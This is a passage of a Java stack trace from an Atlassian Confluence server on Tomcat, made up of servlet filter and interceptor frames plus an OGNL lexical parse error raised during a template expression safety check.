org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.HttpSessionRegistrarFilter.doFilter(HttpSessionRegistrarFilter.java:74) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.seraph.filter.SecurityFilter.doFilter(SecurityFilter.java:242) at com.atlassian.confluence.web.filter.ConfluenceSecurityFilter.applyFilter(ConfluenceSecurityFilter.java:40) at com.atlassian.confluence.web.filter.ConfluenceSecurityFilter.doFilter(ConfluenceSecurityFilter.java:29) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.ThreadLocalCacheFilter.doFilter(ThreadLocalCacheFilter.java:25) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.security.auth.trustedapps.filter.TrustedApplicationsFilter.doFilter(TrustedApplicationsFilter.java:94) at com.atlassian.confluence.util.AbstractBootstrapHotSwappingFilter.doFilter(AbstractBootstrapHotSwappingFilter.java:35) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.seraph.filter.BaseLoginFilter.doFilter(BaseLoginFilter.java:148) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:39) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.oauth.serviceprovider.internal.servlet.OAuthFilter.doFilter(OAuthFilter.java:67) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.pats.web.filter.TokenBasedAuthenticationFilter.doFilter(TokenBasedAuthenticationFilter.java:83) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsCombinedMatchDispatcherFilter.doFilter(PrettyUrlsCombinedMatchDispatcherFilter.java:56) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:55) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:43) at com.atlassian.johnson.plugin.servlet.filter.JohnsonServletFilterModuleContainerFilter.doFilter(JohnsonServletFilterModuleContainerFilter.java:50) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.ClusterHeaderFilter.doFilter(ClusterHeaderFilter.java:57) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at org.springframework.orm.hibernate.support.OpenSessionInViewFilter.doFilterInternal(OpenSessionInViewFilter.java:170) at com.atlassian.confluence.web.filter.ConfluenceOpenSessionInViewFilter.doFilterInternal(ConfluenceOpenSessionInViewFilter.java:41) at org.springframework.web.filter.OncePerRequestFilter.doFilter(OncePerRequestFilter.java:119) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.ConfluenceErrorFilter.doFilter(ConfluenceErrorFilter.java:24) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.util.profiling.filters.ProfilingFilter.doFilter(ProfilingFilter.java:105) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.core.datetime.RequestTimeThreadLocalFilter.doFilter(RequestTimeThreadLocalFilter.java:37) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.core.filters.cache.AbstractCachingFilter.doFilter(AbstractCachingFilter.java:31) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:39) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.analytics.client.filter.DefaultAnalyticsFilter.doFilter(DefaultAnalyticsFilter.java:26) at com.atlassian.analytics.client.filter.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:48) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.jwt.internal.servlet.JwtAuthFilter.doFilter(JwtAuthFilter.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.troubleshooting.thready.filter.AbstractThreadNamingFilter.doFilter(AbstractThreadNamingFilter.java:46) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.web.filter.HttpRequestStatsFilter.doFilter(HttpRequestStatsFilter.java:58) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.gzipfilter.GzipFilter.doFilterInternal(GzipFilter.java:121) at com.atlassian.gzipfilter.GzipFilter.doFilter(GzipFilter.java:92) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.web.filter.ConfluenceTimingFilter.doFilter(ConfluenceTimingFilter.java:47) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.prettyurls.filter.PrettyUrlsCombinedMatchDispatcherFilter.doFilter(PrettyUrlsCombinedMatchDispatcherFilter.java:56) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.extra.webdav.servlet.filter.WebdavRequestForwardFilter.doFilter(WebdavRequestForwardFilter.java:72) at com.atlassian.confluence.extra.webdav.servlet.filter.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:29) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:55) at com.atlassian.plugin.servlet.filter.ServletFilterModuleContainerFilter.doFilter(ServletFilterModuleContainerFilter.java:43) at com.atlassian.johnson.plugin.servlet.filter.JohnsonServletFilterModuleContainerFilter.doFilter(JohnsonServletFilterModuleContainerFilter.java:50) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.MobileAppRequestFilter.doFilter(MobileAppRequestFilter.java:36) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.internal.web.filter.spring.IgnoreWebAsyncManagerFilter.doFilter(IgnoreWebAsyncManagerFilter.java:59) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.validateparam.RequestParamValidationFilter.doFilter(RequestParamValidationFilter.java:51) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.TranslationModeFilter.doFilter(TranslationModeFilter.java:39) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.plugin.servlet.filter.ActionContextCleanUp.doFilter(ActionContextCleanUp.java:71) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.LanguageExtractionFilter.doFilter(LanguageExtractionFilter.java:39) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.impl.vcache.VCacheRequestContextFilter.lambda$doFilter$3(VCacheRequestContextFilter.java:44) at com.atlassian.confluence.impl.vcache.VCacheRequestContextManager.doInRequestContextInternal(VCacheRequestContextManager.java:84) at com.atlassian.confluence.impl.vcache.VCacheRequestContextManager.doInRequestContext(VCacheRequestContextManager.java:68) at com.atlassian.confluence.impl.vcache.VCacheRequestContextFilter.doFilter(VCacheRequestContextFilter.java:43) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.LoggingContextFilter.doFilter(LoggingContextFilter.java:33) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.util.RequestCacheThreadLocalFilter.doFilter(RequestCacheThreadLocalFilter.java:67) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.github.kristofa.brave.servlet.BraveServletFilter.doFilter(BraveServletFilter.java:59) at com.atlassian.confluence.web.filter.ZipkinTracingFilter.doFilter(ZipkinTracingFilter.java:52) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.ResponseOutputStreamFilter.doFilter(ResponseOutputStreamFilter.java:25) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.johnson.filters.AbstractJohnsonFilter.doFilter(AbstractJohnsonFilter.java:59) at com.atlassian.confluence.web.ConfluenceJohnsonFilter.doFilter(ConfluenceJohnsonFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.setup.ConfluenceEncodingFilter.doFilterInternal(ConfluenceEncodingFilter.java:35) at com.atlassian.confluence.web.filter.AbstractStaticResourceAwareFilter.doFilter(AbstractStaticResourceAwareFilter.java:43) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.core.filters.HeaderSanitisingFilter.doFilter(HeaderSanitisingFilter.java:37) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.servlet.FourOhFourErrorLoggingFilter.doFilter(FourOhFourErrorLoggingFilter.java:64) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.internal.diagnostics.HttpRequestMonitoringFilter.doFilter(HttpRequestMonitoringFilter.java:42) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.DebugFilter.doFilter(DebugFilter.java:46) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at org.apache.catalina.core.StandardWrapperValve.invoke(StandardWrapperValve.java:202) at org.apache.catalina.core.StandardContextValve.invoke(StandardContextValve.java:97) at org.apache.catalina.authenticator.AuthenticatorBase.invoke(AuthenticatorBase.java:542) at org.apache.catalina.valves.StuckThreadDetectionValve.invoke(StuckThreadDetectionValve.java:206) at org.apache.catalina.core.StandardHostValve.invoke(StandardHostValve.java:143) at org.apache.catalina.valves.ErrorReportValve.invoke(ErrorReportValve.java:92) at org.apache.catalina.core.StandardEngineValve.invoke(StandardEngineValve.java:78) at org.apache.catalina.connector.CoyoteAdapter.service(CoyoteAdapter.java:357) at org.apache.coyote.http11.Http11Processor.service(Http11Processor.java:374) at org.apache.coyote.AbstractProcessorLight.process(AbstractProcessorLight.java:65) at org.apache.coyote.AbstractProtocol$ConnectionHandler.process(AbstractProtocol.java:893) at org.apache.tomcat.util.net.NioEndpoint$SocketProcessor.doRun(NioEndpoint.java:1707) at org.apache.tomcat.util.net.SocketProcessorBase.run(SocketProcessorBase.java:49) at java.base/java.util.concurrent.ThreadPoolExecutor.runWorker(ThreadPoolExecutor.java:1128) at java.base/java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:628) at org.apache.tomcat.util.threads.TaskThread$WrappingRunnable.run(TaskThread.java:61) at java.base/java.lang.Thread.run(Thread.java:829) /-- Encapsulated exception ------------\ ognl.TokenMgrError: Lexical error at line 1, column 4. Encountered: <EOF> after : "" at ognl.OgnlParserTokenManager.getNextToken(OgnlParserTokenManager.java:1531) at ognl.OgnlParser.jj_ntk(OgnlParser.java:3098) at ognl.OgnlParser.unaryExpression(OgnlParser.java:1081) at ognl.OgnlParser.multiplicativeExpression(OgnlParser.java:973) at ognl.OgnlParser.additiveExpression(OgnlParser.java:896) at ognl.OgnlParser.shiftExpression(OgnlParser.java:752) at ognl.OgnlParser.relationalExpression(OgnlParser.java:510) at ognl.OgnlParser.equalityExpression(OgnlParser.java:407) at ognl.OgnlParser.andExpression(OgnlParser.java:354) at ognl.OgnlParser.exclusiveOrExpression(OgnlParser.java:301) at ognl.OgnlParser.inclusiveOrExpression(OgnlParser.java:248) at ognl.OgnlParser.logicalAndExpression(OgnlParser.java:195) at ognl.OgnlParser.logicalOrExpression(OgnlParser.java:142) at ognl.OgnlParser.conditionalTestExpression(OgnlParser.java:103) at ognl.OgnlParser.assignmentExpression(OgnlParser.java:66) at ognl.OgnlParser.expression(OgnlParser.java:25) at ognl.OgnlParser.topLevelExpression(OgnlParser.java:17) at ognl.Ognl.parseExpression(Ognl.java:113) at com.opensymphony.xwork.util.OgnlUtil.compile(OgnlUtil.java:196) at com.opensymphony.webwork.util.SafeExpressionUtil.isSafeExpression(SafeExpressionUtil.java:69) at com.opensymphony.webwork.util.OgnlValueFinder$Factory$1.findValue(OgnlValueFinder.java:29) at com.opensymphony.webwork.views.jsp.WebWorkTagSupport.findValue(WebWorkTagSupport.java:74) at com.opensymphony.webwork.views.jsp.ui.AbstractUITag.evaluateParams(AbstractUITag.java:378) at com.opensymphony.webwork.views.jsp.ui.AbstractUITag.doEndTag(AbstractUITag.java:213) at com.opensymphony.webwork.views.velocity.AbstractTagDirective.processTag(AbstractTagDirective.java:349) at com.opensymphony.webwork.views.velocity.AbstractTagDirective.render(AbstractTagDirective.java:122) at org.apache.velocity.runtime.parser.node.ASTDirective.render(ASTDirective.java:175) at org.apache.velocity.runtime.parser.node.ASTBlock.render(ASTBlock.java:72) at org.apache.velocity.runtime.parser.node.ASTIfStatement.render(ASTIfStatement.java:87) at org.apache.velocity.runtime.parser.node.SimpleNode.render(SimpleNode.java:336) at org.apache.velocity.Template.merge(Template.java:328) at org.apache.velocity.Template.merge(Template.java:235) at com.opensymphony.webwork.views.jsp.ui.template.VelocityTemplateEngine.renderTemplate(VelocityTemplateEngine.java:52) at com.opensymphony.webwork.views.jsp.ui.AbstractUITag.mergeTemplate(AbstractUITag.java:427) at com.opensymphony.webwork.views.jsp.ui.AbstractUITag.doEndTag(AbstractUITag.java:216) at com.opensymphony.webwork.views.velocity.AbstractTagDirective.processTag(AbstractTagDirective.java:349) at com.opensymphony.webwork.views.velocity.AbstractTagDirective.render(AbstractTagDirective.java:122) at org.apache.velocity.runtime.parser.node.ASTDirective.render(ASTDirective.java:175) at org.apache.velocity.runtime.parser.node.SimpleNode.render(SimpleNode.java:336) at org.apache.velocity.runtime.directive.Parse.render(Parse.java:263) at com.atlassian.confluence.setup.velocity.ProfilingParseDirective.render(ProfilingParseDirective.java:21) at org.apache.velocity.runtime.parser.node.ASTDirective.render(ASTDirective.java:175) at org.apache.velocity.runtime.parser.node.ASTBlock.render(ASTBlock.java:72) at com.atlassian.confluence.setup.velocity.ApplyDecoratorDirective.getRenderedTagBody(ApplyDecoratorDirective.java:180) at com.atlassian.confluence.setup.velocity.ApplyDecoratorDirective.render(ApplyDecoratorDirective.java:155) at org.apache.velocity.runtime.parser.node.ASTDirective.render(ASTDirective.java:175) at org.apache.velocity.runtime.parser.node.SimpleNode.render(SimpleNode.java:336) at org.apache.velocity.Template.merge(Template.java:328) at org.apache.velocity.Template.merge(Template.java:235) at com.opensymphony.webwork.dispatcher.VelocityResult.doExecute(VelocityResult.java:91) at com.atlassian.xwork.results.ProfiledVelocityResult.doExecute(ProfiledVelocityResult.java:18) at com.atlassian.confluence.setup.webwork.EncodingVelocityResult.doExecute(EncodingVelocityResult.java:43) at com.opensymphony.webwork.dispatcher.WebWorkResultSupport.execute(WebWorkResultSupport.java:116) at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.xwork.interceptors.XsrfTokenInterceptor.intercept(XsrfTokenInterceptor.java:120) at com.atlassian.confluence.xwork.ConfluenceXsrfTokenInterceptor.intercept(ConfluenceXsrfTokenInterceptor.java:30) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.ConfluenceLicenseInterceptor.intercept(ConfluenceLicenseInterceptor.java:65) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.validation.MessageHolderInterceptor.intercept(MessageHolderInterceptor.java:37) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.util.LoggingContextInterceptor.intercept(LoggingContextInterceptor.java:44) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.CancellingInterceptor.intercept(CancellingInterceptor.java:21) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.xwork.interceptors.RestrictHttpMethodInterceptor.intercept(RestrictHttpMethodInterceptor.java:119) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.websudo.WebSudoInterceptor.intercept(WebSudoInterceptor.java:57) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.themes.ThemeContextInterceptor.intercept(ThemeContextInterceptor.java:42) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.actions.PermissionCheckInterceptor.intercept(PermissionCheckInterceptor.java:97) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.setup.webwork.BootstrapAwareInterceptor.intercept(BootstrapAwareInterceptor.java:19) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.user.actions.UserAwareInterceptor.intercept(UserAwareInterceptor.java:50) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.pages.actions.CommentAwareInterceptor.intercept(CommentAwareInterceptor.java:37) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.pages.actions.PageAwareInterceptor.intercept(PageAwareInterceptor.java:43) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.spaces.actions.SpaceAwareInterceptor.intercept(SpaceAwareInterceptor.java:70) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.interceptors.ConfluenceAccessInterceptor.intercept(ConfluenceAccessInterceptor.java:31) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61) at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51) at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35) at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165) at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115) at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56) at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199) at javax.servlet.http.HttpServlet.service(HttpServlet.java:733) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:227) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.confluence.web.filter.DebugFilter.doFilter(DebugFilter.java:46) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at org.apache.catalina.core.ApplicationFilterChain.internalDoFilter(ApplicationFilterChain.java:189) at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:162) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:39) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.confluence.plugins.baseurl.IncludeResourcesFilter.doFilter(IncludeResourcesFilter.java:52) at com.atlassian.core.filters.AbstractHttpFilter.doFilter(AbstractHttpFilter.java:32) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.lambda$doFilter$0(DelegatingPluginFilter.java:57) at com.atlassian.labs.botkiller.BotKillerFilter.doFilter(BotKillerFilter.java:36) at com.atlassian.plugin.servlet.filter.DelegatingPluginFilter.doFilter(DelegatingPluginFilter.java:62) at com.atlassian.plugin.servlet.filter.IteratingFilterChain.doFilter(IteratingFilterChain.java:37) at 